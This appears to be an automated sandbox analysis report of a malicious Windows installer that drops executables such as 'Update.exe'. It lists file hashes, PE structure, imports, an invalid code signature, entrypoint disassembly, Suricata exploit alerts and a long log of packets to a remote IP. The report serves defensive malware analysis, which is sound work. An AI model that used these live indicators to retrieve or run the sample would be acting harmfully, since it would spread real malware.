                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):59428352
                                  Entropy (8bit):7.532141685262463
                                  Encrypted:false
                                  SSDEEP:786432:djtzBfpYNswjvUN6AEurPfVKr7RZo5EXmcfJjKDbNm/GAdHNdSfQm/GAdENdSf4Z:dtBfpYvAEuLfVeta5EXr+kF
                                  MD5:C84101CF9E883A329337A3BA6BC74733
                                  SHA1:2F7D2219C7788E93093C9700C244D3828603789B
                                  SHA-256:28D458B0629031FD6571BF3D14E10BD3BCD887AB2AE9456B0988EECBD69A682C
                                  SHA-512:606FADC56DB63EEA1EC1F088687BEC54011BAE433936CA59446BDA221BE58D5F680913ABC340727D7F620FF1FF677C817207D521C51175FB01B14D5C2DA62D1B
                                  Malicious:true
                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....r.f...............&........*.............@.............................p......o....`... .............................................. ..4....P..........x............`..8........................... ...(...................."..P............................text...............................`..`.data...@...........................@....rdata...A...p...B...P..............@..@.pdata..x...........................@..@.xdata..d...........................@..@.bss....@)...............................idata..4.... ......................@....CRT....`....0.....................@....tls.........@.....................@....rsrc........P.....................@....reloc..8....`.....................@..B........................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):59428352
                                  Entropy (8bit):7.532141685262463
                                  Encrypted:false
                                  SSDEEP:786432:djtzBfpYNswjvUN6AEurPfVKr7RZo5EXmcfJjKDbNm/GAdHNdSfQm/GAdENdSf4Z:dtBfpYvAEuLfVeta5EXr+kF
                                  MD5:C84101CF9E883A329337A3BA6BC74733
                                  SHA1:2F7D2219C7788E93093C9700C244D3828603789B
                                  SHA-256:28D458B0629031FD6571BF3D14E10BD3BCD887AB2AE9456B0988EECBD69A682C
                                  SHA-512:606FADC56DB63EEA1EC1F088687BEC54011BAE433936CA59446BDA221BE58D5F680913ABC340727D7F620FF1FF677C817207D521C51175FB01B14D5C2DA62D1B
                                  Malicious:true
                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....r.f...............&........*.............@.............................p......o....`... .............................................. ..4....P..........x............`..8........................... ...(...................."..P............................text...............................`..`.data...@...........................@....rdata...A...p...B...P..............@..@.pdata..x...........................@..@.xdata..d...........................@..@.bss....@)...............................idata..4.... ......................@....CRT....`....0.....................@....tls.........@.....................@....rsrc........P.....................@....reloc..8....`.....................@..B........................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.943917415349148
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:hfi47s4wOT.exe
                                  File size:749'755 bytes
                                  MD5:b74b4dc696daa20dccd7f743c8c1e1a2
                                  SHA1:45d575a6f69cc184b9b15785504b962b5ef041a5
                                  SHA256:585d0e01d18cf7acfb8cb1b7ba54ffbb64e187e0a69372e2dc7f6f6b285a8493
                                  SHA512:96ee732eceecd89eb2cf75c908780f55f76ec1911b2aa3235ce15466f46574598764160dd5a0d0a1802262ec095253bee296301723571b61bb3047352f592b52
                                  SSDEEP:12288:sCHN87E7045Hrmx86xMa+clmYzLz4WMkCclQE6eO+Hptnm4+Lm81lmJQe+w+oztK:s+mQA4YzMlwmYzLsBlM7vO+3nm1m8CJW
                                  TLSH:95F4239913E83563EAE34E702EF5C970ACB1ED1669F9811F53E0FE5B34127404A6E227
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                  File Icon

                                  Icon Hash:70c890808888e820

                                  Static PE Info

                                  General

                                  Entrypoint:0x403883
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:0
                                  File Version Major:5
                                  File Version Minor:0
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:0
                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                  Authenticode Signature

                                  Signature Valid:false
                                  Signature Issuer:CN=GlobalSign GCC R45 CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                  Signature Validation Error:The digital signature of the object did not verify
                                  Error Number:-2146869232
                                  Not Before, Not After
                                  • 27/10/2022 13:36:11 27/10/2025 12:36:11
                                  Subject Chain
                                  • E=administrator@softdeluxe.com, CN=Softdeluxe LLC, O=Softdeluxe LLC, L=Minsk, S=Minsk, C=BY
                                  Version:3
                                  Thumbprint MD5:77A58AB61B34FEA45348BDBD4A787B7A
                                  Thumbprint SHA-1:F145211219978C65FF322D9C16EC82FA90F88671
                                  Thumbprint SHA-256:6E63E53C22B2A24A493666737B8D55C99537E4378A0B5EE625FDA0D3B7A89C1E
                                  Serial:2D44387A96AB85A471453BA0

                                  Entrypoint Preview

                                  Instruction
                                  sub esp, 000002D4h
                                  push ebx
                                  push ebp
                                  push esi
                                  push edi
                                  push 00000020h
                                  xor ebp, ebp
                                  pop esi
                                  mov dword ptr [esp+18h], ebp
                                  mov dword ptr [esp+10h], 00409268h
                                  mov dword ptr [esp+14h], ebp
                                  call dword ptr [00408030h]
                                  push 00008001h
                                  call dword ptr [004080B4h]
                                  push ebp
                                  call dword ptr [004082C0h]
                                  push 00000008h
                                  mov dword ptr [00472EB8h], eax
                                  call 00007FC7612243ABh
                                  push ebp
                                  push 000002B4h
                                  mov dword ptr [00472DD0h], eax
                                  lea eax, dword ptr [esp+38h]
                                  push eax
                                  push ebp
                                  push 00409264h
                                  call dword ptr [00408184h]
                                  push 0040924Ch
                                  push 0046ADC0h
                                  call 00007FC76122408Dh
                                  call dword ptr [004080B0h]
                                  push eax
                                  mov edi, 004C30A0h
                                  push edi
                                  call 00007FC76122407Bh
                                  push ebp
                                  call dword ptr [00408134h]
                                  cmp word ptr [004C30A0h], 0022h
                                  mov dword ptr [00472DD8h], eax
                                  mov eax, edi
                                  jne 00007FC76122197Ah
                                  push 00000022h
                                  pop esi
                                  mov eax, 004C30A2h
                                  push esi
                                  push eax
                                  call 00007FC761223D51h
                                  push eax
                                  call dword ptr [00408260h]
                                  mov esi, eax
                                  mov dword ptr [esp+1Ch], esi
                                  jmp 00007FC761221A03h
                                  push 00000020h
                                  pop ebx
                                  cmp ax, bx
                                  jne 00007FC76122197Ah
                                  add esi, 02h
                                  cmp word ptr [esi], bx

                                  Rich Headers

                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ C ] VS2010 SP1 build 40219
                                  • [RES] VS2010 SP1 build 40219
                                  • [LNK] VS2010 SP1 build 40219

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x3ac8.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xb48130x28a8.ndata
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0xf40000x3ac80x3c00a56a49c10ca502481316a7a340366225False0.349609375data4.21295866257284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xf80000xf320x10006976803e46d6c333a44147f25fbccfafFalse0.242431640625data3.430082311286237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0xf41f00x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.16863303498779494
                                  RT_ICON0xf68580x87ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0050597976080957
                                  RT_ICON0xf70d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5115248226950354
                                  RT_DIALOG0xf75400x100dataEnglishUnited States0.5234375
                                  RT_DIALOG0xf76400x11cdataEnglishUnited States0.6056338028169014
                                  RT_DIALOG0xf77600x60dataEnglishUnited States0.7291666666666666
                                  RT_GROUP_ICON0xf77c00x30dataEnglishUnited States0.8541666666666666
                                  RT_MANIFEST0xf77f00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                  Imports

                                  DLLImport
                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                  2024-07-26T23:14:50.751983+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974240.68.123.157192.168.2.4
                                  2024-07-26T23:14:12.507424+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973540.68.123.157192.168.2.4

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 26, 2024 23:14:22.095308065 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.100478888 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.100560904 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.101624012 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.106530905 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.752584934 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.752609015 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.752625942 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.752652884 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.752777100 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.752793074 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.752809048 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.752825975 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.752841949 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.752859116 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.753138065 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.753154039 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.753170967 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.753194094 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.753204107 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.758107901 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.758203030 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.758312941 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.843158007 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843192101 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843209028 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843226910 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843241930 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843250990 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.843278885 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.843322992 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843338013 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843374968 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.843461037 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843476057 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.843512058 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.844240904 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.844258070 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.844274998 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.844286919 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.844377041 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.844377041 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.844394922 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.844446898 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.845107079 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.845134974 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.845151901 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.845186949 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.845302105 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.845319033 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.845338106 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.845995903 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.846036911 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.846064091 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.846080065 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.846112013 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.848282099 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.848378897 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.848393917 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.848417997 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.898793936 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.938967943 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.938997030 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939013958 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939028025 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939045906 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939053059 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.939079046 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.939121008 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939137936 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939161062 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.939198017 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939321995 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.939508915 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939603090 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939619064 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939652920 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.939805984 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939832926 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939846039 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.939851046 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.940076113 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940120935 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.940152884 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940169096 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940205097 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.940428972 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940448999 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940500021 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.940579891 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940627098 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.940649986 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940665960 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940788031 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.940818071 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940834999 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.940874100 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.941489935 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941505909 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941530943 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941545963 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941553116 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.941561937 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941576958 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941582918 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.941617012 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.941683054 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941698074 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941740990 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.941818953 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941921949 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941939116 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941952944 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941961050 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.941970110 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941984892 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.941992044 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.942003012 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942018986 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.942245960 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942291021 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.942320108 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942389965 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942404985 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942445040 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.942514896 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942529917 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942569017 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.942667961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942691088 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.942713976 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:22.944809914 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:22.944850922 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.027208090 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.027235031 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.027251005 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.027264118 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.027281046 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.027328968 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.027328968 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.028172016 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028198957 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028213978 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028220892 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.028251886 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.028351068 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028364897 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028379917 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028399944 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.028510094 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028593063 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.028620005 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028636932 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028652906 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028667927 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028676033 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.028683901 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028700113 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.028702021 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.028737068 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.028995991 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029117107 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029133081 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029148102 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029150009 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.029165983 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029186964 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.029392958 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029407978 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029424906 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029433966 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:23.029441118 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029455900 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:23.029470921 CEST804974151.77.140.74192.168.2.4
